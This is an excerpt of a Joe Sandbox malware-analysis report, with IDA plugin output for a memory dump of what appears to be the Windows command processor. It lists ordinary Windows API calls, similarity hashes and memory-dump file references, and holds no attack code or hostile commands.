Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ff7d1510000_alpha.jbxd
Similarity
• API ID: CurrentImageNonwritableSleep_amsg_exit_cexit_inittermexit
• String ID:
• API String ID: 4291973834-0
• Opcode ID: 1c7d4f9672c25dc89753b58092f3baa3c71a1f277e4bfd9c8df4ae4aed7312e4
• Instruction ID: d5c798492a9ea8eadece112d5374d136a8042fe81ae4d24956d32f1238edd288
• Opcode Fuzzy Hash: 1c7d4f9672c25dc89753b58092f3baa3c71a1f277e4bfd9c8df4ae4aed7312e4
• Instruction Fuzzy Hash: 0541C922A0861F86F750BB50E94027DA2E0AF54754FE444B7EA1F876B4DFFCE8448760

Control-flow Graph (first node: 7ff7d15189c0-7ff7d1518a3d)
APIs
Memory Dump Source
• Source File: 00000008.00000002.1280784059.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
• Associated: 00000008.00000002.1280765830.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1280838297.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1280883635.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1280883635.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1280883635.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1280883635.00007FF7D1564000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1281021522.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ff7d1510000_alpha.jbxd
Similarity
• API ID: memset$DriveErrorInformationLastTypeVolume
• String ID:
• API String ID: 850181435-0
• Opcode ID: e1379ede723eac65afdf39bc4f10c7cd7bacbf823c50ad72477e63a898fb5baf
• Instruction ID: 0ba5561c39cb0703637671c1dbe0801599e515224e2f0d308e9bfb8045a321cf
• Opcode Fuzzy Hash: e1379ede723eac65afdf39bc4f10c7cd7bacbf823c50ad72477e63a898fb5baf
• Instruction Fuzzy Hash: FC41B032608AC6CAEB709F20D8402EDB7A0FB89744FD54062DA4E47B64CF7CD145C710

                                                                                                                                                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                                        control_flow_graph 1224 7ff7d1524a14-7ff7d1524a3e GetEnvironmentStringsW 1225 7ff7d1524aae-7ff7d1524ac5 1224->1225 1226 7ff7d1524a40-7ff7d1524a46 1224->1226 1227 7ff7d1524a48-7ff7d1524a52 1226->1227 1228 7ff7d1524a59-7ff7d1524a8f GetProcessHeap HeapAlloc 1226->1228 1227->1227 1229 7ff7d1524a54-7ff7d1524a57 1227->1229 1230 7ff7d1524a9f-7ff7d1524aa9 FreeEnvironmentStringsW 1228->1230 1231 7ff7d1524a91-7ff7d1524a9a memmove 1228->1231 1229->1227 1229->1228 1230->1225 1231->1230
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetEnvironmentStringsW.KERNELBASE(?,?,00000000,00007FF7D15249F1), ref: 00007FF7D1524A28
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7D15249F1), ref: 00007FF7D1524A66
                                                                                                                                                                                                                                                                                                                                                                                                                                        • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7D15249F1), ref: 00007FF7D1524A7D
                                                                                                                                                                                                                                                                                                                                                                                                                                        • memmove.MSVCRT(?,?,00000000,00007FF7D15249F1), ref: 00007FF7D1524A9A
                                                                                                                                                                                                                                                                                                                                                                                                                                        • FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF7D15249F1), ref: 00007FF7D1524AA2
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1280784059.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
• Associated: 00000008.00000002.1280765830.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1280838297.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1280883635.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1280883635.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1280883635.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1280883635.00007FF7D1564000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1281021522.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: EnvironmentHeapStrings$AllocFreeProcessmemmove
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 1623332820-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 7b7d5cd90c4b7fc4a2429fe2183f3170931abb96c0362b724e039f9c86480d2b
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 698b0477c31b57655b8129feebdd0b7bf6dc0c8220588d9c75094cd329cf8be1
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7b7d5cd90c4b7fc4a2429fe2183f3170931abb96c0362b724e039f9c86480d2b
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 93119122A1579B82EB50AB01A41403DFBA1FB8AF80BD99076DE4F03765DFBDE4418760
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1280784059.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
• Associated: 00000008.00000002.1280765830.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1280838297.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1280883635.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1280883635.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1280883635.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1280883635.00007FF7D1564000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1281021522.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: CloseCodeExitHandleObjectProcessSingleWaitfflushfprintf
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 1826527819-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: f2fead82e6adea435ca3ec11aeaf7f247f0c9f685b678692693d010e6480eae1
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: f8285144374bbb89e131d7d8273940fb18d22798a679a0c343d3d7f73308b0f6
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f2fead82e6adea435ca3ec11aeaf7f247f0c9f685b678692693d010e6480eae1
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 35015B2190868BCAF704BB14E4542BCFAA0EB8AB55FD46172E94F033B1CFBCA044C720
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1521EA0: wcschr.MSVCRT(?,?,?,00007FF7D151286E,00000000,00000000,00000000,00000000,00000000,0000000A,?,00007FF7D1540D54), ref: 00007FF7D1521EB3
                                                                                                                                                                                                                                                                                                                                                                                                                                        • SetErrorMode.KERNELBASE(00000000,00000000,0000000A,00007FF7D15192AC), ref: 00007FF7D15230CA
                                                                                                                                                                                                                                                                                                                                                                                                                                        • SetErrorMode.KERNELBASE ref: 00007FF7D15230DD
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7D15230F6
                                                                                                                                                                                                                                                                                                                                                                                                                                        • SetErrorMode.KERNELBASE ref: 00007FF7D1523106
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1280784059.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
• Associated: 00000008.00000002.1280765830.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1280838297.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1280883635.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1280883635.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1280883635.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1280883635.00007FF7D1564000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1281021522.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: ErrorMode$FullNamePathwcschr
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 1464828906-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: ae25a92083232286a245a47a38675b80b3e95939c3784da970b3955f028bd4da
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 13675d2372c316cd7a7c50d6965756c4bc3950d983800b2edb6765f6a99b1507
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ae25a92083232286a245a47a38675b80b3e95939c3784da970b3955f028bd4da
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BA31D623E1865B82F764BF15A44007EF661EB49B90FE48176DA4B873F0EEBDE8458710
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: memset
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: onecore\base\cmd\maxpathawarestring.cpp
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 2221118986-3416068913
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 6a4e720990391e2bb656b5b6d9cefd15da5558a473930315f543f8d448153d3d
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 354249369565cc9ef09f053ebda407e590cb74e6a014b37d15ae85d075e39d60
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6a4e720990391e2bb656b5b6d9cefd15da5558a473930315f543f8d448153d3d
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2911C622A0864B81FB51EB55F1542BDA2909F85BA4FD84232DE6F4B7F5DEBDD4808320
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: memsetwcschr
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: 2$COMSPEC
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 1764819092-1738800741
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: b9ab5f7dc9e1de4fb73340b4936d8faa2c9ba4b21260c8514921b1ab44a1c5e6
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 4145adacbd372f8444f0baa456e0340d6b4c9ec16e6b1af03a09be9d7aa3917b
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b9ab5f7dc9e1de4fb73340b4936d8faa2c9ba4b21260c8514921b1ab44a1c5e6
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D4518C21A0C24B49FF62BB25A45137DB3A19F44784FC64133DA0F862F5DEBCE8808671
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: wcschr$ErrorFileFindFirstLastwcsrchr
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 4254246844-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1280784059.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: Heap$EnvironmentFreeProcessVariable
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 2643372051-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1280784059.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: _get_osfhandle$ConsoleMode
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 1591002910-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1280784059.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: DriveType
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: :
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 338552980-336475711
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 3bcdc316eb0a86f33f1a800567ff16fc16a0090fe1dc924e7a0720ee54c15b7d
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 32b4df8c8b9c83d7cb440aeefaaeaafa00aa23679f308d796fb0f2d13ca7615f
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3bcdc316eb0a86f33f1a800567ff16fc16a0090fe1dc924e7a0720ee54c15b7d
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E2E0E563618605C6EB209B50E05106EF7A0FB8C348FC41535EA8E83734DB3CC249CB08
APIs
  • Part of subcall function 00007FF7D151CD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7D151B9A1,?,?,?,?,00007FF7D151D81A), ref: 00007FF7D151CDA6
  • Part of subcall function 00007FF7D151CD90: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7D151B9A1,?,?,?,?,00007FF7D151D81A), ref: 00007FF7D151CDBD
• GetConsoleTitleW.KERNELBASE ref: 00007FF7D1525B52
  • Part of subcall function 00007FF7D1524224: InitializeProcThreadAttributeList.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF7D1524297
  • Part of subcall function 00007FF7D1524224: UpdateProcThreadAttribute.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF7D15242D7
  • Part of subcall function 00007FF7D1524224: memset.MSVCRT ref: 00007FF7D15242FD
  • Part of subcall function 00007FF7D1524224: memset.MSVCRT ref: 00007FF7D1524368
  • Part of subcall function 00007FF7D1524224: GetStartupInfoW.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF7D1524380
  • Part of subcall function 00007FF7D1524224: wcsrchr.MSVCRT ref: 00007FF7D15243E6
  • Part of subcall function 00007FF7D1524224: lstrcmpW.KERNELBASE ref: 00007FF7D1524401
• GetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0 ref: 00007FF7D1525BC7
Memory Dump Source
• Source File: 00000008.00000002.1280784059.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
• Associated: 00000008.00000002.1280765830.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1280838297.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1280883635.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1280883635.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1280883635.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1280883635.00007FF7D1564000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1281021522.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ff7d1510000_alpha.jbxd
Similarity
• API ID: memset$AttributeConsoleHeapProcThreadTitlewcsrchr$AllocInfoInitializeListProcessStartupUpdate_wcsnicmplstrcmpwcschr
• String ID:
• API String ID: 497088868-0
• Opcode ID: 7ab6fa8dc0b51f14b91d73e5ffe10a57052e9477fd238aff7d214e1f01dcae97
• Instruction ID: d2936a102870fc2e473e1021ea05e970d45393d32fae1a659187c67dd0eb2082
• Opcode Fuzzy Hash: 7ab6fa8dc0b51f14b91d73e5ffe10a57052e9477fd238aff7d214e1f01dcae97
• Instruction Fuzzy Hash: B731C422B1C64B42FB20BB11A4501BDE290BF89B80FC44173E94FC7BA5DEBCE4418720
APIs
• FindClose.KERNELBASE(?,?,?,00007FF7D153EAC5,?,?,?,00007FF7D153E925,?,?,?,?,00007FF7D151B9B1), ref: 00007FF7D1523A56
Memory Dump Source
• Source File: 00000008.00000002.1280784059.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
• Associated: 00000008.00000002.1280765830.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1280838297.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1280883635.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1280883635.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1280883635.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1280883635.00007FF7D1564000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1281021522.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ff7d1510000_alpha.jbxd
Similarity
• API ID: CloseFind
• String ID:
• API String ID: 1863332320-0
• Opcode ID: bab5306cd567feeb86bb0befbcdd41048a3801cd437bd301f39ca3c6803b8cd3
• Instruction ID: a7095d5a2e21f5fbe3c623715e8d26e4e8c7c1892fb70a442dc02fde3abf2173
• Opcode Fuzzy Hash: bab5306cd567feeb86bb0befbcdd41048a3801cd437bd301f39ca3c6803b8cd3
• Instruction Fuzzy Hash: 1501D621E1864B86FB94AB15A45007DE6A0EF48B40BE0C072E50FC7674DFECF4918710
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1280784059.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: Concurrency::cancel_current_taskmalloc
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 1412018758-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7D151B9A1,?,?,?,?,00007FF7D151D81A), ref: 00007FF7D151CDA6
                                                                                                                                                                                                                                                                                                                                                                                                                                        • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7D151B9A1,?,?,?,?,00007FF7D151D81A), ref: 00007FF7D151CDBD
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1280784059.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: Heap$AllocProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 1617791916-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1280784059.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: exit
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 2483651598-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1280784059.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
• Associated: 00000008.00000002.1280765830.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1280838297.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1280883635.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1280883635.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1280883635.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1280883635.00007FF7D1564000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1281021522.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: DefaultUser
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 3358694519-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: memset
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 2221118986-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7D1537F44
                                                                                                                                                                                                                                                                                                                                                                                                                                        • _get_osfhandle.MSVCRT ref: 00007FF7D1537F5C
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7D1537F9E
                                                                                                                                                                                                                                                                                                                                                                                                                                        • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7D1537FFF
                                                                                                                                                                                                                                                                                                                                                                                                                                        • ReadConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7D1538020
                                                                                                                                                                                                                                                                                                                                                                                                                                        • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7D1538036
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7D1538061
                                                                                                                                                                                                                                                                                                                                                                                                                                        • RtlFreeHeap.NTDLL ref: 00007FF7D1538075
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7D15380D6
                                                                                                                                                                                                                                                                                                                                                                                                                                        • RtlFreeHeap.NTDLL ref: 00007FF7D15380EA
